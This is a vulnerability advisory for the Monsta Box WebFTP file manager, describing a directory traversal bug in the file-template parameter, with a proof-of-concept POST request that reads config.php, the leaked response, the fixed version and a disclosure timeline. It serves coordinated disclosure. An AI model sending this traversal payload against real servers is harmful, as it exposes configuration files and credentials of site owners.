Application ----------- "MONSTA Box is a lightweight open-source file manager you can install on your website or server * to easily manage your files through any browser." (Description from the official website http://www.monstahq.com/) Vulnerability ------------- The Monsta Box WebFTP application supports file templates when creating new files. The template parameter is part of the HTTP request so it is a user input and it was not sanitized correctly. By sending a HTTP request with modified template parameter it was possible to traverse the template directory and read arbitrary files (in context of the Monsta Box WebFTP application). PoC --- A proof of concept request/response to read the config.php file of the Monsta Box installation (note the template parameter of the HTTP request): POST /? HTTP/1.1 Host: somehost Referer: http://somereferer/ Content-Length: 352 Cookie: PHPSESSID=somecookie &ftpAction=newFile&=Refresh&=Download&=Cut&=Copy&=Paste&=Rename&=Delete&=Logout&newFile=xxx&template=..%2Fconfig.php&=OK&=Cancel&=~&=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&=New%20Folder&=New%20File&=Fetch%20File&=Upload%20Files&=Repeat%20Upload&windowWidth=1280&windowHeight=913 HTTP/1.1 200 OK Server: nginx Date: Sun, 27 Mar 2016 19:34:21 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache 1cac <div id="blackOutDiv"><div id="popupFrame" style="left: 110px; top: 60px; width: 1030px;"><div id="popupHeaderAction">Editing: /xxx</div><div id="popupBodyAction" style="height: 693px;"><input type="hidden" name="file" value="~/xxx"><textarea name="editContent" id="editContent" style="height: 608px;">&lt;?php # Open README file for descriptions and help. $ftpHost = &quot;somehost&quot;; $ftpPort = &quot;21&quot;; ... Affected versions ----------------- The above vulnerability was fixed in version 1.8.3. Older versions of Monsta Box with template support are vulnerable. Timeline -------- 2016-03-29: Vendor contacted for appropriate contact person to report to 2016-03-30: Vulnerability was reported 2016-03-31: Fixed version was published 2016-04-07: Public disclosure Discovered by ------------- Imre RAD www.search-lab.hu www.scademy.com